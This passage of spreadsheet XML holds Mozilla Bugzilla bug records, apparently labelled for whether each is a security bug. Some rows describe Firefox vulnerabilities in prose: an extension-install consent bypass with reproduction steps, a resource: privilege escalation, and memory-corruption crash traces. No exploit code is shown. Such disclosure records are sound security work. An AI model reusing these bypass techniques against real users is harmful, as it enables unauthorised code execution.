    #6 0x7ff429b588db in AppendElement&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1716
    #7 0x7ff429b588db in AppendElement /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:192
    #8 0x7ff429b588db in mozilla::EventListenerManager::AddEventListenerInternal(mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt;, mozilla::EventMessage, nsAtom*, mozilla::EventListenerFlags const&amp;, bool, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:236
    #9 0x7ff429b5eb97 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:728:5
    #10 0x7ff429b6a5a7 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1529:3
    #11 0x7ff42880a06b in SetOndragover /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:173:1
    #12 0x7ff42880a06b in mozilla::dom::Window_Binding::set_ondragover(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:13423
    #13 0x7ff4293cb266 in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3121:8
    #14 0x7ff42ffb33a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:13
    #15 0x7ff42ffb33a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:539
    #16 0x7ff42ffb943d in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:594:10
    #17 0x7ff42ffb943d in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:610
    #18 0x7ff42ffb943d in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:748
    #19 0x7ff4304fca53 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2932:8
    #20 0x7ff4304f5521 in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2961:14
    #21 0x7ff4301fea57 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #22 0x7ff4301fea57 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149
    #23 0x7ff426807ac0 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
    #24 0x7ff4301d38c1 in setInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:395:19
    #25 0x7ff4301d38c1 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:403
    #26 0x7ff42ff91878 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:280:12
    #27 0x7ff42ff91878 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:269
    #28 0x7ff42ff91878 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2849
    #29 0x7ff42ff7ccef in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:424:10
    #30 0x7ff42ffb9c6f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:786:13
    #31 0x7ff43009eb33 in js::DirectEvalStringFromIon(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSString*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:422:10
    #32 0x308de91b36ac  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1680:29 in IsApzAwareListener
Shadow bytes around the buggy address:
  0x0c22803bc850: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c22803bc860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c22803bc870: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
  0x0c22803bc880: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22803bc890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c22803bc8a0:[fd]fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c22803bc8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22803bc8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22803bc8d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c22803bc8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c22803bc8f0: 00 00 00 00 00 00 00 00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8535==ABORTING
```</t>
        </is>
      </c>
      <c r="X5290" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5291">
      <c r="A5291" t="n">
        <v>1599526</v>
      </c>
      <c r="B5291" t="inlineStr">
        <is>
          <t>2019-11-26 10:15:46 -0800</t>
        </is>
      </c>
      <c r="C5291" t="inlineStr">
        <is>
          <t>Push Health fails to parse logs with timeout errors</t>
        </is>
      </c>
      <c r="D5291" t="inlineStr">
        <is>
          <t>2020-01-07 10:46:01 -0800</t>
        </is>
      </c>
      <c r="E5291" t="n">
        <v>1</v>
      </c>
      <c r="F5291" t="n">
        <v>1</v>
      </c>
      <c r="G5291" t="n">
        <v>7</v>
      </c>
      <c r="H5291" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5291" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5291" t="inlineStr">
        <is>
          <t>Push Health</t>
        </is>
      </c>
      <c r="K5291" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5291" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5291" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5291" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5291" t="inlineStr"/>
      <c r="Q5291" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5291" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5291" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5291" t="n">
        <v>1</v>
      </c>
      <c r="U5291" t="n">
        <v>0</v>
      </c>
      <c r="V5291" t="n">
        <v>3</v>
      </c>
      <c r="W5291" t="inlineStr">
        <is>
          <t>Here's log example https://treeherder.mozilla.org/logviewer.html#/jobs?job_id=278228853&amp;repo=try&amp;lineNumber=25320
A failed to parse error:
[task 2019-11-26T13:59:41.052Z] 13:59:41    ERROR - TEST-UNEXPECTED-TIMEOUT | browser/components/sessionstore/test/browser_590563.js (finished) | application timed out after 370 seconds with no output
[task 2019-11-26T13:59:41.052Z] 13:59:41    ERROR - Force-terminating active process(es).
Push Health link: https://treeherder.mozilla.org/pushhealth.html?repo=try&amp;revision=9b2d68fcdb80e9114970f8b773d13f034a71e9e4
Slack chat:
cdawson 12:54 PM
I think the issue is that, since Push Health relies on the structured logging, we don’t get timout messages.  Those happen outside of the harness that does that structured logging.
I agree, this is an issue that needs to be addressed. I’m not sure yet if it’s something that needs to be done upstream (in the test or test harness) or if I can adapt Treeherder to handle it.
asurkov 12:55 PM
ok, will file a bug then
cdawson 12:56 PM
I should say, I know I CAN adapt treeherder, but not sure that’s the best way.  Yeah, thanks for filing.</t>
        </is>
      </c>
      <c r="X5291" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5292">
      <c r="A5292" t="n">
        <v>672485</v>
      </c>
      <c r="B5292" t="inlineStr">
        <is>
          <t>2011-07-19 06:34:26 -0700</t>
        </is>
      </c>
      <c r="C5292" t="inlineStr">
        <is>
          <t>Holding enter allows arbitrary extension installation.</t>
        </is>
      </c>
      <c r="D5292" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:09 -0700</t>
        </is>
      </c>
      <c r="E5292" t="n">
        <v>1</v>
      </c>
      <c r="F5292" t="n">
        <v>1</v>
      </c>
      <c r="G5292" t="n">
        <v>2</v>
      </c>
      <c r="H5292" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5292" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5292" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5292" t="inlineStr">
        <is>
          <t>5 Branch</t>
        </is>
      </c>
      <c r="L5292" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5292" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5292" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5292" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q5292" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5292" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5292" t="inlineStr">
        <is>
          <t>Firefox 9</t>
        </is>
      </c>
      <c r="T5292" t="n">
        <v>1</v>
      </c>
      <c r="U5292" t="n">
        <v>0</v>
      </c>
      <c r="V5292" t="n">
        <v>60</v>
      </c>
      <c r="W5292" t="inlineStr">
        <is>
          <t>It is possible to install an arbitrary XPI without user's consent if the user holds Enter on a malicious website containing a specially crafted JavaScript code.
There are 2 layers of protection against an unauthorized installation of extensions:
1) The principal of the opener is checked against whitelisted domains that are allowed to download the plugin without asking. If the domain is not trusted, the user is asked to allow to download the plugin.
2) When the plugin is downloaded, the user is asked to confirm the installation.
The first protection can be circumvented by creating a hidden "Embed" element containing an arbitrary XPI as its "pluginspage" parameter. The attacker can focus this element while the user holds Enter, causing a number of "Plugin Finder Service" windows to appear. The first window focuses the "Cancel" button and will just close, but all the subsequent ones will set focus on the "Manual Install" button directing to the malicious XPI. As soon as the user releases the key, the browser will start launching multiple windows with the provided URL. The windows will have a ChromeWindow object as their opener, so the user will not be asked to allow to download a plugin.
The second protection can be bypassed due to a logic error in amWebInstallListener.js. When no window-watcher is registered in Services, this will throw:
Services.ww.openWindow(this.window, "chrome://mozapps/content/xpinstall/xpinstallConfirm.xul",null, "chrome,modal,centerscreen", args);
with the following message in the console:
Warning: WARN addons.manager: InstallListener threw exception when calling onDownloadEnded: TypeError: Services.ww is undefined
Source File: resource://gre/components/amWebInstallListener.js
Line: 170
When the confirmation dialog fails to open, the installation will commence as though the user clicked "Install".
Getting the browser into a state in which Services.ww is permanently undefined can be achieved with no user interaction by using a modified version of https://bugzilla.mozilla.org/show_bug.cgi?id=616659 on a signed website. Exploiting it locally will likely bring about corrupt windows and a lot of errors in the console, but Services.ww will be defined. On a remote signed website, with the try-catch-inside-eval recursion performed during page load, after an alert dialog which prevents "too much recursion" error from occuring, it fails silently and Services.ww remains undefined for the whole browsing session, ie. Firefox will not ask to confirm a plugin installation until the user restarts the browser. The only mitigating factor is that if Services.ww was defined earlier in the browser session, the exploit may fail and corrupt windows will appear (hence point #2 in the steps described below, after opening windows to import the certificate). This was noticed by Zach Hoffman in https://bugzilla.mozilla.org/show_bug.cgi?id=616659#c37 but the implications there were reverse.
There may be other ways to wind up with Services.ww undefined, but those should be safe as long as the plugin installation is stopped when xpinstallConfirm.xul fails to open.
Reproducible: always (as long as Services.ww wasn't defined earlier in the browsing session)
Steps to reproduce:
1. Import x509.cert for software makers identification.
2. Close the browser and reopen after the process shuts down.
3. Open jar:http://x.x.x.x/mozilla/signed.jar!exploit.htm (see comment 1)
4. Press and hold enter.
Actual results:
The plugin is automatically downloaded and installed.
Expected results:
The plugin should neither be downloaded nor installed without user's consent.
Verified to work with Firefox 5.0.1 on Windows 7 SP1 64-bit and Windows XP SP3 32-bit.</t>
        </is>
      </c>
      <c r="X5292" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5293">
      <c r="A5293" t="n">
        <v>1144991</v>
      </c>
      <c r="B5293" t="inlineStr">
        <is>
          <t>2015-03-18 18:57:35 -0700</t>
        </is>
      </c>
      <c r="C5293" t="inlineStr">
        <is>
          <t>Privilege escalation from resource:// document (e.g. pdf viewer) (ZDI-CAN-2826)</t>
        </is>
      </c>
      <c r="D5293" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5293" t="n">
        <v>1</v>
      </c>
      <c r="F5293" t="n">
        <v>1</v>
      </c>
      <c r="G5293" t="n">
        <v>3</v>
      </c>
      <c r="H5293" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5293" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5293" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5293" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5293" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5293" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5293" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+]</t>
        </is>
      </c>
      <c r="Q5293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5293" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5293" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5293" t="n">
        <v>1</v>
      </c>
      <c r="U5293" t="n">
        <v>0</v>
      </c>
      <c r="V5293" t="n">
        <v>57</v>
      </c>
      <c r="W5293" t="inlineStr">
        <is>
          <t>Created attachment 8579749
zip file of part 2
From winning Pwn2Own entry by Mariusz Mlynski [2/2]:
-----------------------
2. PRIVILEGE ESCALATION
-----------------------
This is an extension of the cross-origin bypass vulnerability. The internal pdf viewer in Firefox executes with the "resource://pdf.js/web/viewer.html" security principal. It's unprivileged, but the handling of "resource:" principals with respect to loading permissions is incorrect, as documented in the source code:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; /caps/nsScriptSecurityManager.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
NS_IMETHODIMP
nsScriptSecurityManager::CheckLoadURIWithPrincipal(nsIPrincipal* aPrincipal,
                                                   nsIURI *aTargetURI,
                                                   uint32_t aFlags)
{
(...)
    // Check for chrome target URI
    rv = NS_URIChainHasFlags(targetBaseURI,
                             nsIProtocolHandler::URI_IS_UI_RESOURCE,
                             &amp;hasFlags);
    NS_ENSURE_SUCCESS(rv, rv);
    if (hasFlags) {
        (...)
        // resource: and chrome: are equivalent, securitywise
        // That's bogus!!  Fix this.  But watch out for
        // the view-source stylesheet?
        bool sourceIsChrome;
        rv = NS_URIChainHasFlags(sourceBaseURI,
                                 nsIProtocolHandler::URI_IS_UI_RESOURCE,
                                 &amp;sourceIsChrome);
        NS_ENSURE_SUCCESS(rv, rv);
        if (sourceIsChrome) {
            return NS_OK;
        }
        if (reportErrors) {
            ReportError(nullptr, errorTag, sourceURI, aTargetURI);
        }
        return NS_ERROR_DOM_BAD_URI;
    }
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
The nsIProtocolHandler::URI_IS_UI_RESOURCE flag is set for chrome:, resource:, and moz-icon: URIs. They're all free to load other URIs with this flag, including chrome-privileged pages under "chrome:". This bogus treatment of resource: principals paves the way for a privilege escalation in the event of a cross-origin bypass, such as the one described above. The attacker can use the session history confusion to execute code in the context of the pdf viewer and then re-use the said attack to compromise a privileged page, allowing for javascript code execution with the system principal.</t>
        </is>
      </c>
      <c r="X5293" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5294">
      <c r="A5294" t="n">
        <v>328751</v>
      </c>
      <c r="B5294" t="inlineStr">
        <is>
          <t>2006-02-27 10:15:15 -0800</t>
        </is>
      </c>
      <c r="C5294" t="inlineStr">
        <is>
          <t>Trunk crash [@ SinkContext::~SinkContext]</t>
        </is>
      </c>
      <c r="D5294" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E5294" t="n">
        <v>1</v>
      </c>
      <c r="F5294" t="n">
        <v>1</v>
      </c>
      <c r="G5294" t="n">
        <v>3</v>
      </c>
      <c r="H5294" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5294" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5294" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K5294" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5294" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5294" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5294" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5294" t="inlineStr">
        <is>
          <t>[sg:critical?][patch] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q5294" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5294" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5294" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T5294" t="n">
        <v>1</v>
      </c>
      <c r="U5294" t="n">
        <v>0</v>
      </c>
      <c r="V5294" t="n">
        <v>16</v>
      </c>
      <c r="W5294" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060221 Firefox/1.6a1
A heap overflow vulnerability exists within Firefox and Deer Park Alpha 2,
which allows for an attacker to cause the browser to crash, and or execute
arbitrary code on a targeted host.
The vulnerability is caused due to a boundary error within the
“SinkContext::~SinkContext ()” function when processing an applet.  Below is output from gdb on OS X 10.4.5 PPC with Deerpark2 (build 2006022104):
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x7c7f1b78
0x0054bdec in SinkContext::~SinkContext ()
(gdb) bt
#0  0x0054bdec in SinkContext::~SinkContext ()
#1  0x0054dbe4 in HTMLContentSink::~HTMLContentSink ()
#2  0x0059bf4c in nsContentSink::Release ()
#3  0x00307f84 in nsParser::~nsParser ()
#4  0x00308028 in nsParser::Release ()
#5  0x003479ac in nsDocumentOpenInfo::OnStopRequest ()
#6  0x000abbd8 in nsBaseChannel::OnStopRequest ()
#7  0x000cb788 in nsInputStreamPump::OnStateStop ()
#8  0x000cb32c in nsInputStreamPump::OnInputStreamReady ()
#9  0x10083238 in nsAStreamCopier::PostContinuationEvent_Locked ()
#10 0x10044aa4 in PL_HandleEvent ()
#11 0x100449c8 in PL_ProcessPendingEvents ()
#12 0x9075ea68 in __CFRunLoopDoSources0 ()
#13 0x9075df98 in __CFRunLoopRun ()
#14 0x9075da18 in CFRunLoopRunSpecific ()
#15 0x9317d1e0 in RunCurrentEventLoopInMode ()
#16 0x93261f20 in GetNextEventMatchingMask ()
#17 0x93261df0 in WNEInternal ()
#18 0x93261d50 in WaitNextEvent ()
#19 0x006d9700 in nsMacMessagePump::GetEvent ()
#20 0x006d965c in nsMacMessagePump::DoMessagePump ()
#21 0x00369238 in nsAppShell::Run ()
#22 0x00405b80 in nsAppStartup::Run ()
#23 0x00014514 in XRE_main ()
#24 0x0000f698 in start ()
#25 0x0000f518 in start ()
(gdb) quit
Versions Affected:
Deer Park Alpha 2 build: 2006022104 on OS X 10.4.5
Camino 1.0 seems to just lock up, and not crash.
Talkback Incident #:
TB15697882X
Please let me know if you need any other information.
Thanks,
-- 
Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91  34AD C909 A338 D1AF 5D78
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X5294" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5295">
      <c r="A5295" t="n">
        <v>304885</v>
      </c>
      <c r="B5295" t="inlineStr">
        <is>
          <t>2005-08-16 15:11:30 -0700</t>
        </is>
      </c>
      <c r="C5295" t="inlineStr">
        <is>
          <t>UTF-8 encoding mangles multipart messages, breaks whine emails</t>
        </is>
      </c>
      <c r="D5295" t="inlineStr">
        <is>
          <t>2007-11-29 00:01:05 -0800</t>
        </is>
      </c>
      <c r="E5295" t="n">
        <v>1</v>
      </c>
      <c r="F5295" t="n">
        <v>1</v>
      </c>
      <c r="G5295" t="n">
        <v>4</v>
      </c>
      <c r="H5295" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5295" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5295" t="inlineStr">
        <is>
          <t>Whining</t>
        </is>
      </c>
      <c r="K5295" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L5295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5295" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5295" t="inlineStr"/>
      <c r="Q5295" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5295" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5295" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T5295" t="n">
        <v>1</v>
      </c>
      <c r="U5295" t="n">
        <v>2</v>
      </c>
      <c r="V5295" t="n">
        <v>21</v>
      </c>
      <c r="W5295" t="inlineStr">
        <is>
          <t>My server is running under windows 2000 using IIS, perl 5.8.7 and the curent 
CVS version.
I configured an event but the e-mail I reveice is empty.
the title is OK but the body of the empty.
any idea of aditional test I can do to fix this problem ?
PS: I have Bug 135812 patch applied</t>
        </is>
      </c>
      <c r="X5295" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5296">
      <c r="A5296" t="n">
        <v>1343714</v>
      </c>
      <c r="B5296" t="inlineStr">
        <is>
          <t>2017-03-01 17:22:36 -0800</t>
        </is>
      </c>
      <c r="C5296" t="inlineStr">
        <is>
          <t>When whiteboard is populated, prefix value of whiteboard with 'whiteboard:' in section header</t>
        </is>
      </c>
      <c r="D5296" t="inlineStr">
        <is>
          <t>2019-10-15 16:00:22 -0700</t>
        </is>
      </c>
      <c r="E5296" t="n">
        <v>1</v>
      </c>
      <c r="F5296" t="n">
        <v>1</v>
      </c>
      <c r="G5296" t="n">
        <v>7</v>
      </c>
      <c r="H5296" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5296" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5296" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K5296" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5296" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5296" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5296" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5296" t="inlineStr"/>
      <c r="Q5296" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5296" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5296" t="n">
        <v>1</v>
      </c>
      <c r="U5296" t="n">
        <v>0</v>
      </c>
      <c r="V5296" t="n">
        <v>5</v>
      </c>
      <c r="W5296" t="inlineStr">
        <is>
          <t>Created attachment 8842677
A mockup
When the whiteboard field is not empty, prefix the value displayed in the header of the Details module. 
See attachment.</t>
        </is>
      </c>
      <c r="X5296" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5297">
      <c r="A5297" t="n">
        <v>1249183</v>
      </c>
      <c r="B5297" t="inlineStr">
        <is>
          <t>2016-02-17 17:37:26 -0800</t>
        </is>
      </c>
      <c r="C5297" t="inlineStr">
        <is>
          <t>malloc can GC?</t>
        </is>
      </c>
      <c r="D5297" t="inlineStr">
        <is>
          <t>2017-01-05 09:03:05 -0800</t>
        </is>
      </c>
      <c r="E5297" t="n">
        <v>1</v>
      </c>
      <c r="F5297" t="n">
        <v>1</v>
      </c>
      <c r="G5297" t="n">
        <v>3</v>
      </c>
      <c r="H5297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5297" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5297" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K5297" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5297" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5297" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5297" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+] requires vulnerable add-on to exploit</t>
        </is>
      </c>
      <c r="Q5297" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5297" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5297" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T5297" t="n">
        <v>1</v>
      </c>
      <c r="U5297" t="n">
        <v>0</v>
      </c>
      <c r="V5297" t="n">
        <v>14</v>
      </c>
      <c r="W5297" t="inlineStr">
        <is>
          <t>Ok, this got ugly. Real ugly.
